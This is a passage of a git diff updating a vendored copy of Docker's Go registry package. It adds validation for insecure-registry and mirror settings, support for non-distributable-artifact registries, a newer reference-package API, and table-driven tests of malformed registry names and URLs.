-	config.ServiceConfig.IndexConfigs = make(map[string]*registrytypes.IndexInfo, 0)
+	config.ServiceConfig.IndexConfigs = make(map[string]*registrytypes.IndexInfo)
 
 skip:
 	for _, r := range registries {
@@ -120,6 +184,19 @@ skip:
 			config.ServiceConfig.IndexConfigs = originalIndexInfos
 			return err
 		}
+		if strings.HasPrefix(strings.ToLower(r), "http://") {
+			logrus.Warnf("insecure registry %s should not contain 'http://' and 'http://' has been removed from the insecure registry config", r)
+			r = r[7:]
+		} else if strings.HasPrefix(strings.ToLower(r), "https://") {
+			logrus.Warnf("insecure registry %s should not contain 'https://' and 'https://' has been removed from the insecure registry config", r)
+			r = r[8:]
+		} else if validateNoScheme(r) != nil {
+			// Insecure registry should not contain '://'
+			// before returning err, roll back to original data
+			config.ServiceConfig.InsecureRegistryCIDRs = originalCIDRs
+			config.ServiceConfig.IndexConfigs = originalIndexInfos
+			return fmt.Errorf("insecure registry %s should not contain '://'", r)
+		}
 		// Check if CIDR was passed to --insecure-registry
 		_, ipnet, err := net.ParseCIDR(r)
 		if err == nil {
@@ -134,6 +211,12 @@ skip:
 			config.InsecureRegistryCIDRs = append(config.InsecureRegistryCIDRs, data)
 
 		} else {
+			if err := validateHostPort(r); err != nil {
+				config.ServiceConfig.InsecureRegistryCIDRs = originalCIDRs
+				config.ServiceConfig.IndexConfigs = originalIndexInfos
+				return fmt.Errorf("insecure registry %s is not valid: %v", r, err)
+
+			}
 			// Assume `host:port` if not CIDR.
 			config.IndexConfigs[r] = &registrytypes.IndexInfo{
 				Name:     r,
@@ -155,6 +238,25 @@ skip:
 	return nil
 }
 
+// allowNondistributableArtifacts returns true if the provided hostname is part of the list of registries
+// that allow push of nondistributable artifacts.
+//
+// The list can contain elements with CIDR notation to specify a whole subnet. If the subnet contains an IP
+// of the registry specified by hostname, true is returned.
+//
+// hostname should be a URL.Host (`host:port` or `host`) where the `host` part can be either a domain name
+// or an IP address. If it is a domain name, then it will be resolved to IP addresses for matching. If
+// resolution fails, CIDR matching is not performed.
+func allowNondistributableArtifacts(config *serviceConfig, hostname string) bool {
+	for _, h := range config.AllowNondistributableArtifactsHostnames {
+		if h == hostname {
+			return true
+		}
+	}
+
+	return isCIDRMatch(config.AllowNondistributableArtifactsCIDRs, hostname)
+}
+
 // isSecureIndex returns false if the provided indexName is part of the list of insecure registries
 // Insecure registries accept HTTP and/or accept HTTPS with certificates from unknown CAs.
 //
@@ -173,10 +275,17 @@ func isSecureIndex(config *serviceConfig, indexName string) bool {
 		return index.Secure
 	}
 
-	host, _, err := net.SplitHostPort(indexName)
+	return !isCIDRMatch(config.InsecureRegistryCIDRs, indexName)
+}
+
+// isCIDRMatch returns true if URLHost matches an element of cidrs. URLHost is a URL.Host (`host:port` or `host`)
+// where the `host` part can be either a domain name or an IP address. If it is a domain name, then it will be
+// resolved to IP addresses for matching. If resolution fails, false is returned.
+func isCIDRMatch(cidrs []*registrytypes.NetIPNet, URLHost string) bool {
+	host, _, err := net.SplitHostPort(URLHost)
 	if err != nil {
-		// assume indexName is of the form `host` without the port and go on.
-		host = indexName
+		// Assume URLHost is of the form `host` without the port and go on.
+		host = URLHost
 	}
 
 	addrs, err := lookupIP(host)
@@ -193,42 +302,45 @@ func isSecureIndex(config *serviceConfig, indexName string) bool {
 
 	// Try CIDR notation only if addrs has any elements, i.e. if `host`'s IP could be determined.
 	for _, addr := range addrs {
-		for _, ipnet := range config.InsecureRegistryCIDRs {
+		for _, ipnet := range cidrs {
 			// check if the addr falls in the subnet
 			if (*net.IPNet)(ipnet).Contains(addr) {
-				return false
+				return true
 			}
 		}
 	}
 
-	return true
+	return false
 }
 
 // ValidateMirror validates an HTTP(S) registry mirror
 func ValidateMirror(val string) (string, error) {
 	uri, err := url.Parse(val)
 	if err != nil {
-		return "", fmt.Errorf("%s is not a valid URI", val)
+		return "", fmt.Errorf("invalid mirror: %q is not a valid URI", val)
 	}
-
 	if uri.Scheme != "http" && uri.Scheme != "https" {
-		return "", fmt.Errorf("Unsupported scheme %s", uri.Scheme)
+		return "", fmt.Errorf("invalid mirror: unsupported scheme %q in %q", uri.Scheme, uri)
 	}
-
-	if uri.Path != "" || uri.RawQuery != "" || uri.Fragment != "" {
-		return "", fmt.Errorf("Unsupported path/query/fragment at end of the URI")
+	if (uri.Path != "" && uri.Path != "/") || uri.RawQuery != "" || uri.Fragment != "" {
+		return "", fmt.Errorf("invalid mirror: path, query, or fragment at end of the URI %q", uri)
 	}
-
-	return fmt.Sprintf("%s://%s/", uri.Scheme, uri.Host), nil
+	if uri.User != nil {
+		// strip password from output
+		uri.User = url.UserPassword(uri.User.Username(), "xxxxx")
+		return "", fmt.Errorf("invalid mirror: username/password not allowed in URI %q", uri)
+	}
+	return strings.TrimSuffix(val, "/") + "/", nil
 }
 
 // ValidateIndexName validates an index name.
 func ValidateIndexName(val string) (string, error) {
-	if val == reference.LegacyDefaultHostname {
-		val = reference.DefaultHostname
+	// TODO: upstream this to check to reference package
+	if val == "index.docker.io" {
+		val = "docker.io"
 	}
 	if strings.HasPrefix(val, "-") || strings.HasSuffix(val, "-") {
-		return "", fmt.Errorf("Invalid index name (%s). Cannot begin or end with a hyphen.", val)
+		return "", fmt.Errorf("invalid index name (%s). Cannot begin or end with a hyphen", val)
 	}
 	return val, nil
 }
@@ -241,6 +353,30 @@ func validateNoScheme(reposName string) error {
 	return nil
 }
 
+func validateHostPort(s string) error {
+	// Split host and port, and in case s can not be splitted, assume host only
+	host, port, err := net.SplitHostPort(s)
+	if err != nil {
+		host = s
+		port = ""
+	}
+	// If match against the `host:port` pattern fails,
+	// it might be `IPv6:port`, which will be captured by net.ParseIP(host)
+	if !validHostPortRegex.MatchString(s) && net.ParseIP(host) == nil {
+		return fmt.Errorf("invalid host %q", host)
+	}
+	if port != "" {
+		v, err := strconv.Atoi(port)
+		if err != nil {
+			return err
+		}
+		if v < 0 || v > 65535 {
+			return fmt.Errorf("invalid port %q", port)
+		}
+	}
+	return nil
+}
+
 // newIndexInfo returns IndexInfo configuration from indexName
 func newIndexInfo(config *serviceConfig, indexName string) (*registrytypes.IndexInfo, error) {
 	var err error
@@ -275,13 +411,14 @@ func GetAuthConfigKey(index *registrytypes.IndexInfo) string {
 
 // newRepositoryInfo validates and breaks down a repository name into a RepositoryInfo
 func newRepositoryInfo(config *serviceConfig, name reference.Named) (*RepositoryInfo, error) {
-	index, err := newIndexInfo(config, name.Hostname())
+	index, err := newIndexInfo(config, reference.Domain(name))
 	if err != nil {
 		return nil, err
 	}
-	official := !strings.ContainsRune(name.Name(), '/')
+	official := !strings.ContainsRune(reference.FamiliarName(name), '/')
+
 	return &RepositoryInfo{
-		Named:    name,
+		Name:     reference.TrimNamed(name),
 		Index:    index,
 		Official: official,
 	}, nil
diff --git a/vendor/github.com/docker/docker/registry/config_test.go b/vendor/github.com/docker/docker/registry/config_test.go
index 25578a7f2b..30a257e325 100644
--- a/vendor/github.com/docker/docker/registry/config_test.go
+++ b/vendor/github.com/docker/docker/registry/config_test.go
@@ -1,13 +1,138 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
+	"reflect"
+	"sort"
+	"strings"
 	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
+func TestLoadAllowNondistributableArtifacts(t *testing.T) {
+	testCases := []struct {
+		registries []string
+		cidrStrs   []string
+		hostnames  []string
+		err        string
+	}{
+		{
+			registries: []string{"1.2.3.0/24"},
+			cidrStrs:   []string{"1.2.3.0/24"},
+		},
+		{
+			registries: []string{"2001:db8::/120"},
+			cidrStrs:   []string{"2001:db8::/120"},
+		},
+		{
+			registries: []string{"127.0.0.1"},
+			hostnames:  []string{"127.0.0.1"},
+		},
+		{
+			registries: []string{"127.0.0.1:8080"},
+			hostnames:  []string{"127.0.0.1:8080"},
+		},
+		{
+			registries: []string{"2001:db8::1"},
+			hostnames:  []string{"2001:db8::1"},
+		},
+		{
+			registries: []string{"[2001:db8::1]:80"},
+			hostnames:  []string{"[2001:db8::1]:80"},
+		},
+		{
+			registries: []string{"[2001:db8::1]:80"},
+			hostnames:  []string{"[2001:db8::1]:80"},
+		},
+		{
+			registries: []string{"1.2.3.0/24", "2001:db8::/120", "127.0.0.1", "127.0.0.1:8080"},
+			cidrStrs:   []string{"1.2.3.0/24", "2001:db8::/120"},
+			hostnames:  []string{"127.0.0.1", "127.0.0.1:8080"},
+		},
+
+		{
+			registries: []string{"http://mytest.com"},
+			err:        "allow-nondistributable-artifacts registry http://mytest.com should not contain '://'",
+		},
+		{
+			registries: []string{"https://mytest.com"},
+			err:        "allow-nondistributable-artifacts registry https://mytest.com should not contain '://'",
+		},
+		{
+			registries: []string{"HTTP://mytest.com"},
+			err:        "allow-nondistributable-artifacts registry HTTP://mytest.com should not contain '://'",
+		},
+		{
+			registries: []string{"svn://mytest.com"},
+			err:        "allow-nondistributable-artifacts registry svn://mytest.com should not contain '://'",
+		},
+		{
+			registries: []string{"-invalid-registry"},
+			err:        "Cannot begin or end with a hyphen",
+		},
+		{
+			registries: []string{`mytest-.com`},
+			err:        `allow-nondistributable-artifacts registry mytest-.com is not valid: invalid host "mytest-.com"`,
+		},
+		{
+			registries: []string{`1200:0000:AB00:1234:0000:2552:7777:1313:8080`},
+			err:        `allow-nondistributable-artifacts registry 1200:0000:AB00:1234:0000:2552:7777:1313:8080 is not valid: invalid host "1200:0000:AB00:1234:0000:2552:7777:1313:8080"`,
+		},
+		{
+			registries: []string{`mytest.com:500000`},
+			err:        `allow-nondistributable-artifacts registry mytest.com:500000 is not valid: invalid port "500000"`,
+		},
+		{
+			registries: []string{`"mytest.com"`},
+			err:        `allow-nondistributable-artifacts registry "mytest.com" is not valid: invalid host "\"mytest.com\""`,
+		},
+		{
+			registries: []string{`"mytest.com:5000"`},
+			err:        `allow-nondistributable-artifacts registry "mytest.com:5000" is not valid: invalid host "\"mytest.com"`,
+		},
+	}
+	for _, testCase := range testCases {
+		config := emptyServiceConfig
+		err := config.LoadAllowNondistributableArtifacts(testCase.registries)
+		if testCase.err == "" {
+			if err != nil {
+				t.Fatalf("expect no error, got '%s'", err)
+			}
+
+			var cidrStrs []string
+			for _, c := range config.AllowNondistributableArtifactsCIDRs {
+				cidrStrs = append(cidrStrs, c.String())
+			}
+
+			sort.Strings(testCase.cidrStrs)
+			sort.Strings(cidrStrs)
+			if (len(testCase.cidrStrs) > 0 || len(cidrStrs) > 0) && !reflect.DeepEqual(testCase.cidrStrs, cidrStrs) {
+				t.Fatalf("expect AllowNondistributableArtifactsCIDRs to be '%+v', got '%+v'", testCase.cidrStrs, cidrStrs)
+			}
+
+			sort.Strings(testCase.hostnames)
+			sort.Strings(config.AllowNondistributableArtifactsHostnames)
+			if (len(testCase.hostnames) > 0 || len(config.AllowNondistributableArtifactsHostnames) > 0) && !reflect.DeepEqual(testCase.hostnames, config.AllowNondistributableArtifactsHostnames) {
+				t.Fatalf("expect AllowNondistributableArtifactsHostnames to be '%+v', got '%+v'", testCase.hostnames, config.AllowNondistributableArtifactsHostnames)
+			}
+		} else {
+			if err == nil {
+				t.Fatalf("expect error '%s', got no error", testCase.err)
+			}
+			if !strings.Contains(err.Error(), testCase.err) {
+				t.Fatalf("expect error '%s', got '%s'", testCase.err, err)
+			}
+		}
+	}
+}
+
 func TestValidateMirror(t *testing.T) {
 	valid := []string{
 		"http://mirror-1.com",
+		"http://mirror-1.com/",
 		"https://mirror-1.com",
+		"https://mirror-1.com/",
 		"http://localhost",
 		"https://localhost",
 		"http://localhost:5000",
@@ -21,15 +146,14 @@ func TestValidateMirror(t *testing.T) {
 	invalid := []string{
 		"!invalid!://%as%",
 		"ftp://mirror-1.com",
-		"http://mirror-1.com/",
 		"http://mirror-1.com/?q=foo",
 		"http://mirror-1.com/v1/",
 		"http://mirror-1.com/v1/?q=foo",
 		"http://mirror-1.com/v1/?q=foo#frag",
 		"http://mirror-1.com?q=foo",
 		"https://mirror-1.com#frag",
-		"https://mirror-1.com/",
 		"https://mirror-1.com/#frag",
+		"http://foo:bar@mirror-1.com/",
 		"https://mirror-1.com/v1/",
 		"https://mirror-1.com/v1/#",
 		"https://mirror-1.com?q",
@@ -47,3 +171,211 @@ func TestValidateMirror(t *testing.T) {
 		}
 	}
 }
+
+func TestLoadInsecureRegistries(t *testing.T) {
+	testCases := []struct {
+		registries []string
+		index      string
+		err        string
+	}{
+		{
+			registries: []string{"127.0.0.1"},
+			index:      "127.0.0.1",
+		},
+		{
+			registries: []string{"127.0.0.1:8080"},
+			index:      "127.0.0.1:8080",
+		},
+		{
+			registries: []string{"2001:db8::1"},
+			index:      "2001:db8::1",
+		},
+		{
+			registries: []string{"[2001:db8::1]:80"},
+			index:      "[2001:db8::1]:80",
+		},
+		{
+			registries: []string{"http://mytest.com"},
+			index:      "mytest.com",
+		},
+		{
+			registries: []string{"https://mytest.com"},
+			index:      "mytest.com",
+		},
+		{
+			registries: []string{"HTTP://mytest.com"},
+			index:      "mytest.com",
+		},
+		{
+			registries: []string{"svn://mytest.com"},
+			err:        "insecure registry svn://mytest.com should not contain '://'",
+		},
+		{
+			registries: []string{"-invalid-registry"},
+			err:        "Cannot begin or end with a hyphen",
+		},
+		{
+			registries: []string{`mytest-.com`},
+			err:        `insecure registry mytest-.com is not valid: invalid host "mytest-.com"`,
+		},
+		{
+			registries: []string{`1200:0000:AB00:1234:0000:2552:7777:1313:8080`},
+			err:        `insecure registry 1200:0000:AB00:1234:0000:2552:7777:1313:8080 is not valid: invalid host "1200:0000:AB00:1234:0000:2552:7777:1313:8080"`,
+		},
+		{
+			registries: []string{`mytest.com:500000`},
+			err:        `insecure registry mytest.com:500000 is not valid: invalid port "500000"`,
+		},
+		{
+			registries: []string{`"mytest.com"`},
+			err:        `insecure registry "mytest.com" is not valid: invalid host "\"mytest.com\""`,
+		},
+		{
+			registries: []string{`"mytest.com:5000"`},
+			err:        `insecure registry "mytest.com:5000" is not valid: invalid host "\"mytest.com"`,
+		},
+	}
+	for _, testCase := range testCases {
+		config := emptyServiceConfig
+		err := config.LoadInsecureRegistries(testCase.registries)
+		if testCase.err == "" {
+			if err != nil {
+				t.Fatalf("expect no error, got '%s'", err)
+			}
+			match := false
+			for index := range config.IndexConfigs {
+				if index == testCase.index {
+					match = true
+				}
+			}
+			if !match {
+				t.Fatalf("expect index configs to contain '%s', got %+v", testCase.index, config.IndexConfigs)
+			}
+		} else {
+			if err == nil {
+				t.Fatalf("expect error '%s', got no error", testCase.err)
+			}
+			if !strings.Contains(err.Error(), testCase.err) {
+				t.Fatalf("expect error '%s', got '%s'", testCase.err, err)
+			}
+		}
+	}
+}
+
+func TestNewServiceConfig(t *testing.T) {
+	testCases := []struct {
+		opts   ServiceOptions
+		errStr string
+	}{
+		{
+			ServiceOptions{},
+			"",
+		},
+		{
+			ServiceOptions{
+				Mirrors: []string{"example.com:5000"},
+			},
+			`invalid mirror: unsupported scheme "example.com" in "example.com:5000"`,
+		},
+		{
+			ServiceOptions{
+				Mirrors: []string{"http://example.com:5000"},
+			},
+			"",
+		},
+		{
+			ServiceOptions{
+				InsecureRegistries: []string{"[fe80::]/64"},
+			},
+			`insecure registry [fe80::]/64 is not valid: invalid host "[fe80::]/64"`,
+		},
+		{
+			ServiceOptions{
+				InsecureRegistries: []string{"102.10.8.1/24"},
+			},
+			"",
+		},
+		{
+			ServiceOptions{
+				AllowNondistributableArtifacts: []string{"[fe80::]/64"},
+			},
+			`allow-nondistributable-artifacts registry [fe80::]/64 is not valid: invalid host "[fe80::]/64"`,
+		},
+		{
+			ServiceOptions{
+				AllowNondistributableArtifacts: []string{"102.10.8.1/24"},
+			},
+			"",
+		},
+	}
+
+	for _, testCase := range testCases {
+		_, err := newServiceConfig(testCase.opts)
+		if testCase.errStr != "" {
+			assert.Check(t, is.Error(err, testCase.errStr))
+		} else {
+			assert.Check(t, err)
+		}
+	}
+}
+
+func TestValidateIndexName(t *testing.T) {
+	valid := []struct {
+		index  string
+		expect string
+	}{
+		{
+			index:  "index.docker.io",
+			expect: "docker.io",
+		},
+		{
+			index:  "example.com",
+			expect: "example.com",
+		},
+		{
+			index:  "127.0.0.1:8080",
+			expect: "127.0.0.1:8080",
+		},
+		{
+			index:  "mytest-1.com",
+			expect: "mytest-1.com",
+		},
+		{
+			index:  "mirror-1.com/v1/?q=foo",
+			expect: "mirror-1.com/v1/?q=foo",
+		},
+	}
+
+	for _, testCase := range valid {
+		result, err := ValidateIndexName(testCase.index)
+		if assert.Check(t, err) {
+			assert.Check(t, is.Equal(testCase.expect, result))
+		}
+
+	}
+
+}
+
+func TestValidateIndexNameWithError(t *testing.T) {
+	invalid := []struct {
+		index string
+		err   string
+	}{
+		{
+			index: "docker.io-",
+			err:   "invalid index name (docker.io-). Cannot begin or end with a hyphen",
+		},
+		{
+			index: "-example.com",
+			err:   "invalid index name (-example.com). Cannot begin or end with a hyphen",
+		},
+		{
+			index: "mirror-1.com/v1/?q=foo-",
+			err:   "invalid index name (mirror-1.com/v1/?q=foo-). Cannot begin or end with a hyphen",
+		},
+	}
+	for _, testCase := range invalid {
+		_, err := ValidateIndexName(testCase.index)
+		assert.Check(t, is.Error(err, testCase.err))
+	}
+}
diff --git a/vendor/github.com/docker/docker/registry/config_unix.go b/vendor/github.com/docker/docker/registry/config_unix.go
index d692e8ef50..20fb47bcae 100644
--- a/vendor/github.com/docker/docker/registry/config_unix.go
+++ b/vendor/github.com/docker/docker/registry/config_unix.go
@@ -1,10 +1,6 @@
 // +build !windows
 
-package registry
-
-import (
-	"github.com/spf13/pflag"
-)
+package registry // import "github.com/docker/docker/registry"
 
 var (
 	// CertsDir is the directory where certificates are stored
@@ -18,8 +14,3 @@ var (
 func cleanPath(s string) string {
 	return s
 }
-
-// installCliPlatformFlags handles any platform specific flags for the service.
-func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) {
-	flags.BoolVar(&options.V2Only, "disable-legacy-registry", false, "Disable contacting legacy registries")
-}
diff --git a/vendor/github.com/docker/docker/registry/config_windows.go b/vendor/github.com/docker/docker/registry/config_windows.go
index d1b313dc1e..6de0508f87 100644
--- a/vendor/github.com/docker/docker/registry/config_windows.go
+++ b/vendor/github.com/docker/docker/registry/config_windows.go
@@ -1,11 +1,9 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
 	"os"
 	"path/filepath"
 	"strings"
-
-	"github.com/spf13/pflag"
 )
 
 // CertsDir is the directory where certificates are stored
@@ -18,8 +16,3 @@ var CertsDir = os.Getenv("programdata") + `\docker\certs.d`
 func cleanPath(s string) string {
 	return filepath.FromSlash(strings.Replace(s, ":", "", -1))
 }
-
-// installCliPlatformFlags handles any platform specific flags for the service.
-func (options *ServiceOptions) installCliPlatformFlags(flags *pflag.FlagSet) {
-	// No Windows specific flags.
-}
diff --git a/vendor/github.com/docker/docker/registry/endpoint_test.go b/vendor/github.com/docker/docker/registry/endpoint_test.go
index 8451d3f678..9268c3a4f0 100644
--- a/vendor/github.com/docker/docker/registry/endpoint_test.go
+++ b/vendor/github.com/docker/docker/registry/endpoint_test.go
@@ -1,4 +1,4 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
 	"net/http"
diff --git a/vendor/github.com/docker/docker/registry/endpoint_v1.go b/vendor/github.com/docker/docker/registry/endpoint_v1.go
index 6bcf8c935d..832fdb95a4 100644
--- a/vendor/github.com/docker/docker/registry/endpoint_v1.go
+++ b/vendor/github.com/docker/docker/registry/endpoint_v1.go
@@ -1,4 +1,4 @@
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
 	"crypto/tls"
@@ -9,9 +9,9 @@ import (
 	"net/url"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution/registry/client/transport"
 	registrytypes "github.com/docker/docker/api/types/registry"
+	"github.com/sirupsen/logrus"
 )
 
 // V1Endpoint stores basic information about a V1 registry endpoint.
@@ -67,9 +67,9 @@ func validateEndpoint(endpoint *V1Endpoint) error {
 	return nil
 }
 
-func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) (*V1Endpoint, error) {
+func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, metaHeaders http.Header) *V1Endpoint {
 	endpoint := &V1Endpoint{
-		IsSecure: (tlsConfig == nil || !tlsConfig.InsecureSkipVerify),
+		IsSecure: tlsConfig == nil || !tlsConfig.InsecureSkipVerify,
 		URL:      new(url.URL),
 	}
 
@@ -77,8 +77,8 @@ func newV1Endpoint(address url.URL, tlsConfig *tls.Config, userAgent string, met
 
 	// TODO(tiborvass): make sure a ConnectTimeout transport is used
 	tr := NewTransport(tlsConfig)
-	endpoint.client = HTTPClient(transport.NewTransport(tr, DockerHeaders(userAgent, metaHeaders)...))
-	return endpoint, nil
+	endpoint.client = HTTPClient(transport.NewTransport(tr, Headers(userAgent, metaHeaders)...))
+	return endpoint
 }
 
 // trimV1Address trims the version off the address and returns the
@@ -123,7 +123,7 @@ func newV1EndpointFromStr(address string, tlsConfig *tls.Config, userAgent strin
 		return nil, err
 	}
 
-	endpoint, err := newV1Endpoint(*uri, tlsConfig, userAgent, metaHeaders)
+	endpoint := newV1Endpoint(*uri, tlsConfig, userAgent, metaHeaders)
 	if err != nil {
 		return nil, err
 	}
@@ -175,7 +175,7 @@ func (e *V1Endpoint) Ping() (PingResult, error) {
 		Standalone: true,
 	}
 	if err := json.Unmarshal(jsonString, &info); err != nil {
-		logrus.Debugf("Error unmarshalling the _ping PingResult: %s", err)
+		logrus.Debugf("Error unmarshaling the _ping PingResult: %s", err)
 		// don't stop here. Just assume sane defaults
 	}
 	if hdr := resp.Header.Get("X-Docker-Registry-Version"); hdr != "" {
diff --git a/vendor/github.com/docker/docker/registry/errors.go b/vendor/github.com/docker/docker/registry/errors.go
new file mode 100644
index 0000000000..5bab02e5e2
--- /dev/null
+++ b/vendor/github.com/docker/docker/registry/errors.go
@@ -0,0 +1,31 @@
+package registry // import "github.com/docker/docker/registry"
+
+import (
+	"net/url"
+
+	"github.com/docker/distribution/registry/api/errcode"
+	"github.com/docker/docker/errdefs"
+)
+
+type notFoundError string
+
+func (e notFoundError) Error() string {
+	return string(e)
+}
+
+func (notFoundError) NotFound() {}
+
+func translateV2AuthError(err error) error {
+	switch e := err.(type) {
+	case *url.Error:
+		switch e2 := e.Err.(type) {
+		case errcode.Error:
+			switch e2.Code {
+			case errcode.ErrorCodeUnauthorized:
+				return errdefs.Unauthorized(err)
+			}
+		}
+	}
+
+	return err
+}
diff --git a/vendor/github.com/docker/docker/registry/registry.go b/vendor/github.com/docker/docker/registry/registry.go
index 17fa97ce3d..7a84bbfb7e 100644
--- a/vendor/github.com/docker/docker/registry/registry.go
+++ b/vendor/github.com/docker/docker/registry/registry.go
@@ -1,5 +1,5 @@
 // Package registry contains client primitives to interact with a remote Docker registry.
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
 	"crypto/tls"
@@ -13,10 +13,10 @@ import (
 	"strings"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution/registry/client/transport"
 	"github.com/docker/go-connections/sockets"
 	"github.com/docker/go-connections/tlsconfig"
+	"github.com/sirupsen/logrus"
 )
 
 var (
@@ -81,7 +81,7 @@ func ReadCertsDirectory(tlsConfig *tls.Config, directory string) error {
 			keyName := certName[:len(certName)-5] + ".key"
 			logrus.Debugf("cert: %s", filepath.Join(directory, f.Name()))
 			if !hasFile(fs, keyName) {
-				return fmt.Errorf("Missing key %s for client certificate %s. Note that CA certificates should use the extension .crt.", keyName, certName)
+				return fmt.Errorf("missing key %s for client certificate %s. Note that CA certificates should use the extension .crt", keyName, certName)
 			}
 			cert, err := tls.LoadX509KeyPair(filepath.Join(directory, certName), filepath.Join(directory, keyName))
 			if err != nil {
@@ -102,8 +102,8 @@ func ReadCertsDirectory(tlsConfig *tls.Config, directory string) error {
 	return nil
 }
 
-// DockerHeaders returns request modifiers with a User-Agent and metaHeaders
-func DockerHeaders(userAgent string, metaHeaders http.Header) []transport.RequestModifier {
+// Headers returns request modifiers with a User-Agent and metaHeaders
+func Headers(userAgent string, metaHeaders http.Header) []transport.RequestModifier {
 	modifiers := []transport.RequestModifier{}
 	if userAgent != "" {
 		modifiers = append(modifiers, transport.NewHeaderRequestModifier(http.Header{
diff --git a/vendor/github.com/docker/docker/registry/registry_mock_test.go b/vendor/github.com/docker/docker/registry/registry_mock_test.go
index 21fc1fdcc7..bf17eb9fc7 100644
--- a/vendor/github.com/docker/docker/registry/registry_mock_test.go
+++ b/vendor/github.com/docker/docker/registry/registry_mock_test.go
@@ -1,6 +1,4 @@
-// +build !solaris
-
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
 	"encoding/json"
@@ -17,11 +15,11 @@ import (
 	"testing"
 	"time"
 
+	"github.com/docker/distribution/reference"
 	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/reference"
 	"github.com/gorilla/mux"
 
-	"github.com/Sirupsen/logrus"
+	"github.com/sirupsen/logrus"
 )
 
 var (
@@ -175,7 +173,7 @@ func makePublicIndex() *registrytypes.IndexInfo {
 	return index
 }
 
-func makeServiceConfig(mirrors []string, insecureRegistries []string) *serviceConfig {
+func makeServiceConfig(mirrors []string, insecureRegistries []string) (*serviceConfig, error) {
 	options := ServiceOptions{
 		Mirrors:            mirrors,
 		InsecureRegistries: insecureRegistries,
@@ -432,7 +430,7 @@ func handlerImages(w http.ResponseWriter, r *http.Request) {
 		writeResponse(w, "", 204)
 		return
 	}
-	images := []map[string]string{}
+	var images []map[string]string
 	for imageID, layer := range testLayers {
 		image := make(map[string]string)
 		image["id"] = imageID
diff --git a/vendor/github.com/docker/docker/registry/registry_test.go b/vendor/github.com/docker/docker/registry/registry_test.go
index 786dfbed40..b7459471b3 100644
--- a/vendor/github.com/docker/docker/registry/registry_test.go
+++ b/vendor/github.com/docker/docker/registry/registry_test.go
@@ -1,19 +1,20 @@
-// +build !solaris
-
-package registry
+package registry // import "github.com/docker/docker/registry"
 
 import (
 	"fmt"
 	"net/http"
 	"net/http/httputil"
 	"net/url"
+	"os"
 	"strings"
 	"testing"
 
+	"github.com/docker/distribution/reference"
 	"github.com/docker/distribution/registry/client/transport"
 	"github.com/docker/docker/api/types"
 	registrytypes "github.com/docker/docker/api/types/registry"
-	"github.com/docker/docker/reference"
+	"gotest.tools/assert"
+	"gotest.tools/skip"
 )
 
 var (
@@ -33,7 +34,7 @@ func spawnTestRegistrySession(t *testing.T) *Session {
 	}
 	userAgent := "docker test client"
 	var tr http.RoundTripper = debugTransport{NewTransport(nil), t.Log}
-	tr = transport.NewTransport(AuthTransport(tr, authConfig, false), DockerHeaders(userAgent, nil)...)
+	tr = transport.NewTransport(AuthTransport(tr, authConfig, false), Headers(userAgent, nil)...)
 	client := HTTPClient(tr)
 	r, err := NewSession(client, authConfig, endpoint)
 	if err != nil {
@@ -54,6 +55,7 @@ func spawnTestRegistrySession(t *testing.T) *Session {
 }
 
 func TestPingRegistryEndpoint(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	testPing := func(index *registrytypes.IndexInfo, expectedStandalone bool, assertMessage string) {
 		ep, err := NewV1Endpoint(index, "", nil)
 		if err != nil {
@@ -73,6 +75,7 @@ func TestPingRegistryEndpoint(t *testing.T) {
 }
 
 func TestEndpoint(t *testing.T) {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
 	// Simple wrapper to fail test if err != nil
 	expandEndpoint := func(index *registrytypes.IndexInfo) *V1Endpoint {
 		endpoint, err := NewV1Endpoint(index, "", nil)
@@ -201,7 +204,7 @@ func TestGetRemoteImageLayer(t *testing.T) {
 
 func TestGetRemoteTag(t *testing.T) {
 	r := spawnTestRegistrySession(t)
-	repoRef, err := reference.ParseNamed(REPO)
+	repoRef, err := reference.ParseNormalizedNamed(REPO)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -211,7 +214,7 @@ func TestGetRemoteTag(t *testing.T) {
 	}
 	assertEqual(t, tag, imageID, "Expected tag test to map to "+imageID)
 
-	bazRef, err := reference.ParseNamed("foo42/baz")
+	bazRef, err := reference.ParseNormalizedNamed("foo42/baz")
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -223,7 +226,7 @@ func TestGetRemoteTag(t *testing.T) {
 
 func TestGetRemoteTags(t *testing.T) {
 	r := spawnTestRegistrySession(t)
-	repoRef, err := reference.ParseNamed(REPO)
+	repoRef, err := reference.ParseNormalizedNamed(REPO)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -235,7 +238,7 @@ func TestGetRemoteTags(t *testing.T) {
 	assertEqual(t, tags["latest"], imageID, "Expected tag latest to map to "+imageID)
 	assertEqual(t, tags["test"], imageID, "Expected tag test to map to "+imageID)
 
-	bazRef, err := reference.ParseNamed("foo42/baz")
+	bazRef, err := reference.ParseNormalizedNamed("foo42/baz")
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -252,7 +255,7 @@ func TestGetRepositoryData(t *testing.T) {
 		t.Fatal(err)
 	}
 	host := "http://" + parsedURL.Host + "/v1/"
-	repoRef, err := reference.ParseNamed(REPO)
+	repoRef, err := reference.ParseNormalizedNamed(REPO)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -505,7 +508,7 @@ func TestParseRepositoryInfo(t *testing.T) {
 	}
 
 	for reposName, expectedRepoInfo := range expectedRepoInfos {
-		named, err := reference.WithName(reposName)
+		named, err := reference.ParseNormalizedNamed(reposName)
 		if err != nil {
 			t.Error(err)
 		}
@@ -515,9 +518,9 @@ func TestParseRepositoryInfo(t *testing.T) {
 			t.Error(err)
 		} else {
